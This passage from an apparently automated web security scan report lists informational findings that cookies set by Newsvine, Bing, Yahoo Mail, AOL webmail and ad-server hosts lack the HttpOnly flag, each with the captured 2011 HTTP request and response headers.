The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXe8gB1ttrVL1UTNow8-ycNk5nkmECiF81g==/view.pxl/ HTTP/1.1
Host: this.content.served.by.adshuffle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sid=7b2fbc92-cfda-4d32-8a9d-0293b3f8c07b; v=576462396875340721; ts=1/29/2011+12:42:58+AM; av1=c0596.66bcd=0114111510:b5d53.66348=0114111516:51f37.61f6d=0129111929; vcs0=vC0596:66BCD_0_0_0_2066CE_0_0|vB5D53:66348_0_0_0_2066D4_0_0|v51F37:61F6D_0_0_0_20BC31_0_0; vc=; z=4; NSC_betivggmf-opef=ffffffff0908153745525d5f4f58455e445a4a423660;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Date: Sun, 30 Jan 2011 01:51:09 GMT
Content-Length: 0
Set-Cookie: NSC_betivggmf-opef=ffffffff0908153745525d5f4f58455e445a4a423660;expires=Sun, 30-Jan-2011 01:56:09 GMT;path=/


17.402. http://toddkenreck.newsvine.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://toddkenreck.newsvine.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: toddkenreck.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:57:39 GMT
Server: Apache/2.2.14 (Debian)
Vary: negotiate
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=c66a118e1fcbecd5b536a96e40929013; expires=Sat, 25-Jan-2031 02:57:39 GMT; path=/; domain=.newsvine.com
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 66367

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content-
...[SNIP]...

17.403. http://top.newsvine.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://top.newsvine.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: top.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 03:00:36 GMT
Server: Apache/2.2.14 (Debian)
Vary: negotiate,Host
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=91e5bf02a7007c2a6827929e99162d52; expires=Sat, 25-Jan-2031 03:00:36 GMT; path=/; domain=.newsvine.com
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 44669

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content-
...[SNIP]...

17.404. http://top.newsvine.com/users

Summary

Severity:   Information
Confidence:   Certain
Host:   http://top.newsvine.com
Path:   /users

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /users HTTP/1.1
Host: top.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:58:16 GMT
Server: Apache/2.2.14 (Debian)
Vary: negotiate,Host
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=a08b4d7ef3970ad6780f87b910dbac7c; expires=Sat, 25-Jan-2031 02:58:16 GMT; path=/; domain=.newsvine.com
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 25806

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content-
...[SNIP]...

17.405. http://tv.redacted/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tv.redacted
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: tv.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 69709
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: stad=; path=/
Set-Cookie: MC1=V=3&GUID=dfa3666ab2b24263815b585d8424c2c2; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:51:39 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   MSN TV: Ho
...[SNIP]...

17.406. http://tv.redacted/tv/article.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tv.redacted
Path:   /tv/article.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tv/article.aspx?news=625552&gt1=28103 HTTP/1.1
Host: tv.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 54757
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: stad=; path=/
Set-Cookie: MC1=V=3&GUID=62ae4f15c8c0486a828bffcaa09140f2; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:51:40 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   Source: Sh
...[SNIP]...

17.407. http://us.mc1125.mail.yahoo.com/mc/compose

Summary

Severity:   Information
Confidence:   Certain
Host:   http://us.mc1125.mail.yahoo.com
Path:   /mc/compose

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mc/compose HTTP/1.1
Host: us.mc1125.mail.yahoo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sun, 30 Jan 2011 01:22:08 GMT
Set-Cookie: B=eb61ua56k9fa0&b=3&s=19; expires=Tue, 29-Jan-2013 20:00:00 GMT; path=/; domain=.yahoo.com
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Location: http://login.yahoo.com?.src=ym&.done=http%3A%2F%2Fus.mc1125.mail.yahoo.com%2Fmc%2Fcompose
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Cache-Control: private
Age: 0
Connection: close
Via: HTTP/1.1 r17.ycpi.ac4.yahoo.net (YahooTrafficServer/1.19.5 [cMsSf ])
Server: YTS/1.19.5


17.408. http://redcated/CNT/iview/299297287/direct

Summary

Severity:   Information
Confidence:   Certain
Host:   http://redcated
Path:   /CNT/iview/299297287/direct

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /CNT/iview/299297287/direct;pc.106028736;wi.300;hi.120/01?click= HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://www.redacted/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: redcated
Proxy-Connection: Keep-Alive
Cookie: MUID=AD04D6F8B2FF44629973BD0674351135

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 261
Content-Type: text/html
Expires: 0
P3P: CP="NOI DSP COR CUR ADM DEV TAIo PSAo PSDo OUR BUS UNI PUR COM NAV INT DEM STA PRE OTC"
Set-Cookie: AA002=001296343597-3954973; expires=Monday, 28-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
Connection: close
Date: Sat, 29 Jan 2011 23:26:37 GMT

<body style=margin:0><a target=_blank href="http://clk.atdmt.com/goiframe/199711109/299297287/direct;pc.106028736;wi.300;hi.120/01" onclick="(new Image).src='http://t.redcated'"><img src="http://ec.a
...[SNIP]...

17.409. http://wbenedetti.newsvine.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://wbenedetti.newsvine.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: wbenedetti.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 03:05:09 GMT
Server: Apache/2.2.14 (Debian)
Vary: negotiate
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=37e0e82eb5225aaf39e58b2c59ea3714; expires=Sat, 25-Jan-2031 03:05:09 GMT; path=/; domain=.newsvine.com
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 80810

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content-
...[SNIP]...

17.410. http://webmail.aol.com/28200/aim/en-us/mail/compose-message.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://webmail.aol.com
Path:   /28200/aim/en-us/mail/compose-message.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /28200/aim/en-us/mail/compose-message.aspx HTTP/1.1
Host: webmail.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: http://my.screenname.aol.com/_cqr/login/login.psp?sitedomain=sns.webmail.aol.com&lang=en&locale=us&authLev=0&siteState=ver%3a4%7crt%3aSTANDARD%7cat%3aSNS%7cld%3awebmail.aol.com%7crp%3amail%252fcompose-message.aspx%7cuv%3aAIM%7clc%3aen-us%7cmt%3aAIM%7csnt%3aScreenName%7csid%3a9e2a15e1-c5a7-4311-bdd6-07d5c021abea&offerId=newmail-en-us-v2&seamless=novl
Server: Microsoft-IIS/7.0
Set-Cookie: Context=ver:3&sid:9e2a15e1-c5a7-4311-bdd6-07d5c021abea&rt:STANDARD&ckd:.mail.aol.com&ckp:%2f&ha:XjnLSPb%2fjfv6pCJfOQsdJbtdTfc%3d&; domain=.mail.aol.com; path=/
P3P: CP="CURo TAIo IVAo IVDo ONL UNI COM NAV INT DEM STA OUR"
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 01:22:12 GMT
Content-Length: 492

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://my.screenname.aol.com/_cqr/login/login.psp?sitedomain=sns.webmail.aol.com&amp;lang=en&amp;locale=us&amp;authLe
...[SNIP]...

17.411. http://www.bing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Content-Length: 28803
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.redacted/w3c/p3p.xml"
X-UA-Compatible: IE=7
Date: Sat, 29 Jan 2011 23:52:03 GMT
Connection: close
Set-Cookie: _SS=SID=116E16B4881F4F76A93BF81949677C2F; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Mon, 28-Jan-2013 23:52:03 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ca7a8f284da884884a06f8cb36768c20c; expires=Mon, 28-Jan-2013 23:52:03 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1619992&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:52:03 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"><head><meta
...[SNIP]...

17.412. http://www.bing.com/challenge

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /challenge

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /challenge HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/challenge
Cache-Control: max-age=0
Origin: http://www.bing.com
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; _UR=OMW=1; _FP=BDCE=129407839256968337&BDCEH=7BEF6608F1F2E27015D4037638CCD541; _SS=SID=4318D78D50E640FC90E674B1FECFA468&hIm=178; RMS=F=O; MUID=DC63BAA44C3843F38378B4BB213E0A6F; OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; SRCHD=SM=1&MS=1621031&D=1593447&AF=NOFORM
Content-Length: 210

encanswer=E376D841E2A5505191B255EB573C7490ECAC704AF7599F66EF723B9ACE4866E711F100C9257803D4E056382B5EA70E8F&query=%252fvideos%252fresults.aspx&IG=83a9fd7913fd45e19c7f20da5201b519&useranswer=9zem2&submi
...[SNIP]...

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: private
Content-Length: 0
Content-Type: text/html; charset=utf-8
Location: /videos/results.aspx
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.redacted/w3c/p3p.xml"
Vary: Accept-Encoding
Date: Sun, 30 Jan 2011 17:11:46 GMT
Connection: close
Set-Cookie: _FP=BDCE=129409675061634862&BDCEH=4B00CE098126B4CE6DFFB8D547F7B893; expires=Tue, 29-Jan-2013 17:11:46 GMT; domain=.bing.com; path=/
Set-Cookie: _HOP=I=1&TS=1296407506; domain=.bing.com; path=/


17.413. http://www.bing.com/events/search

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /events/search

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /events/search HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 116
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.redacted/w3c/p3p.xml"
Date: Sat, 29 Jan 2011 23:53:30 GMT
Connection: close
Set-Cookie: _SS=SID=712D1F94FAED4E98B6E572C9C51BBEF4; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1619993&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:53:30 GMT; domain=.bing.com; path=/

Ref A: B2575C613A604708B56E80B00C179519 Ref B: F3576EA2ACED896FAE6E8179524B8516 Ref C: Sat Jan 29 15:53:30 2011
PST

17.414. http://www.bing.com/fd/ls/GLinkPing.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /fd/ls/GLinkPing.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /fd/ls/GLinkPing.aspx?CM=TMF&IG=9874d115203d4525a6dc5f12136077f0&CID=F741A5D3C8544F77A0B57D8439E7E06E HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/videos/results.aspx
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; _UR=OMW=1; _FP=BDCE=129407839256968337&BDCEH=7BEF6608F1F2E27015D4037638CCD541; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c9874d115203d4525a6dc5f12136077f0; OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; SRCHD=MS=1621031&D=1593447&AF=NOFORM; _SS=SID=4318D78D50E640FC90E674B1FECFA468&hIm=178; RMS=F=O; MUID=DC63BAA44C3843F38378B4BB213E0A6F

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 42
Content-Type: image/gif
Expires: Sun, 12 Oct 2003 00:00:00 GMT
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.redacted/w3c/p3p.xml"
Date: Sun, 30 Jan 2011 17:11:14 GMT
Connection: close
Set-Cookie: OrigMUID=; expires=Thu, 01-Feb-2001 17:11:14 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=SM=1&MS=1621031&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:11:14 GMT; domain=.bing.com; path=/

GIF89a.............!.......,...........L.;

17.415. http://www.bing.com/fd/ls/l

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /fd/ls/l

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /fd/ls/l?IG=9874d115203d4525a6dc5f12136077f0&CID=F741A5D3C8544F77A0B57D8439E7E06E&PM=Y&Type=Event.CPT&DATA={%22pp%22:{%22S%22:%22L%22,%22PC%22:3,%22FC%22:-1,%22BC%22:3,%22BS%22:10,%22H%22:12,%22C1%22:-1,%22C2%22:-1,%22BP%22:1000,%22KP%22:-1,%22CT%22:1019,%22IL%22:1}}&P=video&DA=Bl2 HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/videos/results.aspx
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; _UR=OMW=1; _FP=BDCE=129407839256968337&BDCEH=7BEF6608F1F2E27015D4037638CCD541; _SS=SID=4318D78D50E640FC90E674B1FECFA468; MUID=F741A5D3C8544F77A0B57D8439E7E06E; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c9874d115203d4525a6dc5f12136077f0; OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; SRCHD=MS=1621019&D=1593447&AF=NOFORM

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 42
Content-Type: image/gif
Expires: Sun, 12 Oct 2003 00:00:00 GMT
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.redacted/w3c/p3p.xml"
Date: Sun, 30 Jan 2011 17:11:10 GMT
Connection: close
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1621031&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:11:10 GMT; domain=.bing.com; path=/

GIF89a.............!.......,...........L.;

17.416. http://www.bing.com/finance/stockscreener

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /finance/stockscreener

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /finance/stockscreener HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 128153
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.redacted/w3c/p3p.xml"
X-UA-Compatible: IE=7
Date: Sun, 30 Jan 2011 01:52:17 GMT
Connection: close
Set-Cookie: _SS=SID=965375748DDD4D8188E499C867CEF5C8; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Tue, 29-Jan-2013 01:52:17 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c03e263debce44bb8933c4855c834e0ea; expires=Tue, 29-Jan-2013 01:52:17 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1620112&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 01:52:17 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:Web="h
...[SNIP]...

17.417. http://www.bing.com/images/results.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /images/results.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /images/results.aspx HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 62450
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.redacted/w3c/p3p.xml"
X-UA-Compatible: IE=7
Date: Sat, 29 Jan 2011 23:52:13 GMT
Connection: close
Set-Cookie: IMGSCHUSR=scratchpad=0&details=1&BE=1; expires=Mon, 28-Jan-2013 23:52:13 GMT; domain=.bing.com; path=/images
Set-Cookie: _SS=SID=284EF21770EF4BD0AA7FB9D61CA8CF78; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Mon, 28-Jan-2013 23:52:13 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce493bb2b667d42a4bbbffd58ff8085dc; expires=Mon, 28-Jan-2013 23:52:13 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1619992&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:52:13 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"><head><meta
...[SNIP]...

17.418. http://www.bing.com/local/ypdefault.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /local/ypdefault.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /local/ypdefault.aspx HTTP/1.1
Host: www.bing.com
Accept: */*
